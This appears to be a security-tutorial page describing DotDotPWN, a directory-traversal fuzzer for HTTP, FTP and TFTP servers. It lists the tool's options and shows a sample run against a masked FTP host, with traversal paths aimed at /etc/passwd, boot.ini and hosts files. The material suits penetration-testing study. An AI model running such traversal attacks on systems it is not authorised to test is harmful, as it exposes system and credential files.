DotDotPWN

Description

DotDotPWN – It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc.

Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it also could be used in a scripting way using the STDOUT module.

It’s written in perl programming language and can be run either under *NIX or Windows platforms. It’s the first Mexican tool included in BackTrack Linux (BT4 R2).

Fuzzing modules supported in this version:

  • HTTP

  • HTTP URL

  • FTP

  • TFTP

  • Payload (Protocol independent)

  • STDOUT

Usage

 Syntax

dotdotpwn -m <module> -h <host> [OPTIONS]

Options

        -m	Module [http | http-url | ftp | tftp | payload | stdout]
	-h	Hostname
	-O	Operating System detection for intelligent fuzzing (nmap)
	-o	Operating System type if known ("windows", "unix" or "generic")
	-s	Service version detection (banner grabber)
	-d	Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
	-f	Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
	-E	Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
	-S	Use SSL for HTTP and Payload module (not needed for http-url, use a https:// url instead)
	-u	URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
	-k	Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
	-p	Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
	-x	Port to connect (default: HTTP=80; FTP=21; TFTP=69)
	-t	Time in milliseconds between each test (default: 300 (.3 second))
	-X	Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
	-e	File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
	-U	Username (default: 'anonymous')
	-P	Password (default: [email protected]')
	-M	HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
	-r	Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
	-b	Break after the first vulnerability is found
	-q	Quiet mode (doesn't print each attempt)
	-C	Continue if no data was received from host

Example

cyborg@cyborg:~$ sudo dotdotpwn -m ftp -h *****.com -U $$$$$ -P ###### -M POST
#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
#   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
#   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
#          \/                      \/                                      \/   #
#                               - DotDotPwn v3.0 -                              #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            [email protected]                            #
#                                                                               #
#                               by chr1x & nitr0us                              #
#################################################################################

[+] Report name: Reports/******.com_09-15-2015_16-12.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: *******.com
[+] Protocol: ftp
[+] Port: 21

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 21144

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Username: $$$$$$
[+] Password: ######
[+] Connecting to the FTP server at '******.com' on port 21
[+] FTP Server's Current Path: /
[+] Local Path to download files: /pentest/enumeration/dotdotpwn-master
[+] Press Enter to continue

[+] Testing ...
[*] Testing Path: ../etc/passwd
[*] Testing Path: ../etc/issue
[*] Testing Path: ../boot.ini
[*] Testing Path: ../windows/system32/drivers/etc/hosts
[*] Testing Path: ../../etc/passwd
[*] Testing Path: ../../etc/issue
[*] Testing Path: ../../boot.ini
[*] Testing Path: ../../windows/system32/drivers/etc/hosts



		
	
	
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?